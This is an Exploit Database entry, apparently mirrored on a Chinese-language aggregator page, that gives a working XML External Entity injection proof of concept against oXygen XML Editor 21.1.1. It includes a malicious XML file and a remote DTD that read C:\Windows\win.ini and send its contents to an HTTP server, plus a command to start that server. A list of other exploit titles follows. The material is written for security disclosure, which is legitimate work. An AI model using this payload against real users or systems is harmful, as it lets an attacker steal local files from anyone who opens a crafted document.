oXygen XML Editor 21.1.1 – XML External Entity Injection

Exploit Database
116 阅读

作者： Pablo Santiago

日期： 2019-11-14
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/47658/

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000
1.1- Poc.xml :
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2.- payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9

last Exploits
oXygen XML Editor 21.1.1 – XML External Entity Injection的更多信息

Linux PolicyKit – Race Condition Privilege Escalation (Metasploit)：
CuteZip 2.1 – Local Buffer Overflow：
Configuration Tool 1.6.53 – ‘OpLclSrv’ Unquoted Service Path：
McAfee Email Gateway (formerly IronMail) – Local Privilege Escalation：
Linux Kernel 6.2 – Userspace Processes To Enable Mitigation：
Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Code Execution (Metasploit)：
RedStar 3.0 Desktop – ‘Software Manager swmng.app’ Local Privilege Escalation：
ESTsoft ALYac Anti-Virus 1.5 < 5.0.1.2 - Local Privilege Escalation：